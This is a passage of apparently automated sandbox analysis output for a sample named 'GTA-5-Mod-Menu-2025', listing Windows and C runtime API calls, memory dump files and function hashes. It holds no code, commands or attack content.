                                                                    • Opcode Fuzzy Hash: 655e4ab8902906345a9f6d54cf3d92e6a7c5726b0be5f2c82256592c1c5bce52
                                                                    • Instruction Fuzzy Hash: 68F0E53670020997EF14AF35E96566BBF94EFC1B20B0A4458EA198B2A0C776D846E790
                                                                    APIs
                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,00F90A23,?,20001004,00000000,00000002,?,?,00F8F931), ref: 00F963E9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLocale
                                                                    • String ID:
                                                                    • API String ID: 2299586839-0
                                                                    • Opcode ID: eddc1577f4daab2cc5bb391f3a6a44248e727090f2122c4e4ef3f7981a69624e
                                                                    • Instruction ID: d67e52deeff9007716740d58df61b84ad9f52701791e834a2e436be209dffad7
                                                                    • Opcode Fuzzy Hash: eddc1577f4daab2cc5bb391f3a6a44248e727090f2122c4e4ef3f7981a69624e
                                                                    • Instruction Fuzzy Hash: 60E04F7290012CBBDF122F60EC04EAE7F26EF44761F054011FC05A6221CB769920BAD1
                                                                    APIs
                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00009B50), ref: 00F89A2C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled
                                                                    • String ID:
                                                                    • API String ID: 3192549508-0
                                                                    • Opcode ID: 0f851d35f9a6342a173ca0b3cdb99c9219182d737f647761b33f5917b6901236
                                                                    • Instruction ID: fb68d458ecf7e24256d3357d1c5e12897a2eda930c9587f406bf057c23a38ec4
                                                                    • Opcode Fuzzy Hash: 0f851d35f9a6342a173ca0b3cdb99c9219182d737f647761b33f5917b6901236
                                                                    • Instruction Fuzzy Hash:
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: HeapProcess
                                                                    • String ID:
                                                                    • API String ID: 54951025-0
                                                                    • Opcode ID: 63bfd1de56f1d3c2962337067e8eec560b72feb586b0d05c0abbc05b916ed25c
                                                                    • Instruction ID: c7144aac35f024a716ff11f866716642f70c03e2bd6948cb9d18bfee21ce806d
                                                                    • Opcode Fuzzy Hash: 63bfd1de56f1d3c2962337067e8eec560b72feb586b0d05c0abbc05b916ed25c
                                                                    • Instruction Fuzzy Hash: 57A00474501115CF77404F35DD55F1D37D5F5455D17454155D415C5170D7744450FF01
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7e38f65e453b4b9fc46d9b0cb871e78bcbb7573e52fc563137549bf3b5e3af46
                                                                    • Instruction ID: 4bd34aaed5f06d692ceaf7149cdff96dd67e9911265ec5b0996e4e0ceb41f662
                                                                    • Opcode Fuzzy Hash: 7e38f65e453b4b9fc46d9b0cb871e78bcbb7573e52fc563137549bf3b5e3af46
                                                                    • Instruction Fuzzy Hash: F4D0923A641A58EFC210CF49E440D41F7B8FB8E770B154166EA4893B20C331FC11CAE0
                                                                    APIs
                                                                    • GetCPInfo.KERNEL32(00B70530,00B70530,00000000,7FFFFFFF,?,00FA417D,00B70530,00B70530,00000000,00B70530,?,?,?,?,00B70530,00000000), ref: 00FA4238
                                                                    • __alloca_probe_16.LIBCMT ref: 00FA42F3
                                                                    • __alloca_probe_16.LIBCMT ref: 00FA4382
                                                                    • __freea.LIBCMT ref: 00FA43CD
                                                                    • __freea.LIBCMT ref: 00FA43D3
                                                                    • __freea.LIBCMT ref: 00FA4409
                                                                    • __freea.LIBCMT ref: 00FA440F
                                                                    • __freea.LIBCMT ref: 00FA441F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: __freea$__alloca_probe_16$Info
                                                                    • String ID:
                                                                    • API String ID: 127012223-0
                                                                    • Opcode ID: 470fba1de211c3fd6291227bb96b0349e61853677a398423f39d4994ca3680a3
                                                                    • Instruction ID: 7d5ed09f621ddf01f2c461627fdd4c1691ca26db63c999399dfc9e8222e6835d
                                                                    • Opcode Fuzzy Hash: 470fba1de211c3fd6291227bb96b0349e61853677a398423f39d4994ca3680a3
                                                                    • Instruction Fuzzy Hash: 3B7184B2D042099BDF21AE948C81BAE77F59F8B720F280059FD04A7281D7F5AC41B760
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: _strrchr
                                                                    • String ID:
                                                                    • API String ID: 3213747228-0
                                                                    • Opcode ID: b258c23f8f5adf4b5b829db56bad2fb8a7efe0f2db3ca2ba46b92337591bc9f9
                                                                    • Instruction ID: 6f67d6a2429b463f6e75f03fba0b3a9068bfac505b5086a5cc38bdd6ebe5b726
                                                                    • Opcode Fuzzy Hash: b258c23f8f5adf4b5b829db56bad2fb8a7efe0f2db3ca2ba46b92337591bc9f9
                                                                    • Instruction Fuzzy Hash: 5AB17972D003959FFF118F64CC81BAE7BA5EF563A0F284155E904AF282DA78DC02D7A1
                                                                    APIs
                                                                    • _ValidateLocalCookies.LIBCMT ref: 00F8ABA7
                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00F8ABAF
                                                                    • _ValidateLocalCookies.LIBCMT ref: 00F8AC38
                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00F8AC63
                                                                    • _ValidateLocalCookies.LIBCMT ref: 00F8ACB8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                    • String ID: csm
                                                                    • API String ID: 1170836740-1018135373
                                                                    • Opcode ID: edf93fba279839227daa040a9b069bd2020f08c679034ffdb873340300774f03
                                                                    • Instruction ID: d5b55b0b8cb1552bb51935a115e20e61b6a0fea8e574afa80352531ecc35bdf4
                                                                    • Opcode Fuzzy Hash: edf93fba279839227daa040a9b069bd2020f08c679034ffdb873340300774f03
                                                                    • Instruction Fuzzy Hash: A541E434E006189BDF11EF68CC80ADEBBA5FF46324F148156E8159B352D739EA01EF92
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9adebf9683660455a4d8c70e7b38d8cda70925b854ddf81af821773a1889c154
                                                                    • Instruction ID: 91c069a3b2c4bd251f775bd82e6405f913a325666f0f3183bfd9b49db4c83746
                                                                    • Opcode Fuzzy Hash: 9adebf9683660455a4d8c70e7b38d8cda70925b854ddf81af821773a1889c154
                                                                    • Instruction Fuzzy Hash: E3B1D2B5E0424AAFEF11DFA9CC81BAEBBB1BF46314F144158F40197292C7759E41EBA0
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,00F94424,00F8A93D,00F89B94), ref: 00F9443B
                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F94449
                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F94462
                                                                    • SetLastError.KERNEL32(00000000,00F94424,00F8A93D,00F89B94), ref: 00F944B4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastValue___vcrt_
                                                                    • String ID:
                                                                    • API String ID: 3852720340-0
                                                                    • Opcode ID: 19bfe50721451d14acfc7d273b515eb61d50a6a59e20d58bcfc0939637f310da
                                                                    • Instruction ID: 49382c49d4f6112997bfa1b71997e8f701cff1eade1f30c6105a9ea15005266a
                                                                    • Opcode Fuzzy Hash: 19bfe50721451d14acfc7d273b515eb61d50a6a59e20d58bcfc0939637f310da
                                                                    • Instruction Fuzzy Hash: 0801D43350A71A6EBF256A79BCC5E2B3684EB61775720033AFD10951E1EF159C027640
                                                                    APIs
                                                                    • type_info::operator==.LIBVCRUNTIME ref: 00F94E2B
                                                                    • CallUnexpected.LIBVCRUNTIME ref: 00F950A4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: CallUnexpectedtype_info::operator==
                                                                    • String ID: csm$csm$csm
                                                                    • API String ID: 2673424686-393685449
                                                                    • Opcode ID: 1d0b69a17d2c7afb6b6fd11eb3136ab9ed5bb7eadb4d43e1719054a255dad67d
                                                                    • Instruction ID: 8e1b621ca649cef9029f0863a6ef52fe32879a76698721b42964529bdb798b96
                                                                    • Opcode Fuzzy Hash: 1d0b69a17d2c7afb6b6fd11eb3136ab9ed5bb7eadb4d43e1719054a255dad67d
                                                                    • Instruction Fuzzy Hash: 3DB18E71C0020ADFEF25EFA4C841DAEB7B5BF24310B14456AE9156B212D335EA52EF91
                                                                    APIs
                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,EDB057DF,?,?,00000000,00FA5644,000000FF,?,00F8F279,00F8F160,?,00F8F315,00000000), ref: 00F8F1ED
                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00F8F1FF
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,00FA5644,000000FF,?,00F8F279,00F8F160,?,00F8F315,00000000), ref: 00F8F221
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                    • API String ID: 4061214504-1276376045
                                                                    • Opcode ID: d76dfb3c27f8d06555b6f2c8f19b9beb478da1d0858dfeb99062b7dbed283b07
                                                                    • Instruction ID: f36bc089717ac345db1de9b5ae15ef30cd40ac21a63e2d25e8d9785aba7ace64
                                                                    • Opcode Fuzzy Hash: d76dfb3c27f8d06555b6f2c8f19b9beb478da1d0858dfeb99062b7dbed283b07
                                                                    • Instruction Fuzzy Hash: 5A01A2B594061DAFDB119F50DC49FEEBBF8FB05B21F000625E811E22D0DB789900EB90
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00F877B9
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00F877C4
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00F87832
                                                                      • Part of subcall function 00F876AF: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00F876C7
                                                                    • std::locale::_Setgloballocale.LIBCPMT ref: 00F877DF
                                                                    • _Yarn.LIBCPMT ref: 00F877F5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                    • String ID:
                                                                    • API String ID: 1088826258-0
                                                                    • Opcode ID: d3c4ef334024c25fc6306221d53b2f6ede452d3747d8e27b709c4b7f91bb258c
                                                                    • Instruction ID: 5f04daa246362c1e49661ae77f31e37cde3b2c594a63e0848c4e07d747094a87
                                                                    • Opcode Fuzzy Hash: d3c4ef334024c25fc6306221d53b2f6ede452d3747d8e27b709c4b7f91bb258c
                                                                    • Instruction Fuzzy Hash: E601BCB5A142148BC706FF20CC956BDBBA1BFC5350B284109E80257382CF38AE02EBD1
                                                                    APIs
                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00F9F70C,00000000,?,00FB1E20,?,?,?,00F9F643,00000004,InitializeCriticalSectionEx,00FA90D4,00FA90DC), ref: 00F9F67D
                                                                    • GetLastError.KERNEL32(?,00F9F70C,00000000,?,00FB1E20,?,?,?,00F9F643,00000004,InitializeCriticalSectionEx,00FA90D4,00FA90DC,00000000,?,00F9535C), ref: 00F9F687
                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00F9F6AF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoad$ErrorLast
                                                                    • String ID: api-ms-
                                                                    • API String ID: 3177248105-2084034818
                                                                    • Opcode ID: 39a924ea26b3926f540d38970971b565e9e49389cba57a293815af76abbfa807
                                                                    • Instruction ID: e6596e05a9302da43d67098b527185de99e0bdd205619c727939c85c7b77bc18
                                                                    • Opcode Fuzzy Hash: 39a924ea26b3926f540d38970971b565e9e49389cba57a293815af76abbfa807
                                                                    • Instruction Fuzzy Hash: 30E04F71B8430DB7FF201B60EC0AB693F559B11B62F544430F90CE84F1EBA6E854B945
                                                                    APIs
                                                                    • GetConsoleOutputCP.KERNEL32(EDB057DF,00000000,00000000,?), ref: 00F9D771
                                                                      • Part of subcall function 00F957C1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00F96F95,?,00000000,-00000008), ref: 00F95822
                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00F9D9C3
                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00F9DA09
                                                                    • GetLastError.KERNEL32 ref: 00F9DAAC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                    • String ID:
                                                                    • API String ID: 2112829910-0
                                                                    • Opcode ID: 036b815668dc472ea77d01318cd017024e5511eec4d354f28b551bfe50ec5e13
                                                                    • Instruction ID: 6e24bfb7eaafa703dd8b1425dd5af7d625bf63d35ad0a24a14d32e17dd1e8ae1
                                                                    • Opcode Fuzzy Hash: 036b815668dc472ea77d01318cd017024e5511eec4d354f28b551bfe50ec5e13
                                                                    • Instruction Fuzzy Hash: 60D17BB5D042489FEF15CFE8C880AEDBBB5FF09314F28416AE456EB352D634A942DB50
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: AdjustPointer
                                                                    • String ID:
                                                                    • API String ID: 1740715915-0
                                                                    • Opcode ID: d306b10ba91bb4f0dec3dabd3faa357e8787cce7fbfdc4750acfbafb675266e9
                                                                    • Instruction ID: f13ffd7b116ff19730d926e84be091ed8e0e8163593eccee758490b76470b9b7
                                                                    • Opcode Fuzzy Hash: d306b10ba91bb4f0dec3dabd3faa357e8787cce7fbfdc4750acfbafb675266e9
                                                                    • Instruction Fuzzy Hash: AE51E172A05A069FFF289F10D891FAAB3A4FFA0320F144529E90587291E735FC42E794
                                                                    APIs
                                                                      • Part of subcall function 00F957C1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00F96F95,?,00000000,-00000008), ref: 00F95822
                                                                    • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00F9B59A
                                                                    • __dosmaperr.LIBCMT ref: 00F9B5A1
                                                                    • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00F9B5DB
                                                                    • __dosmaperr.LIBCMT ref: 00F9B5E2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
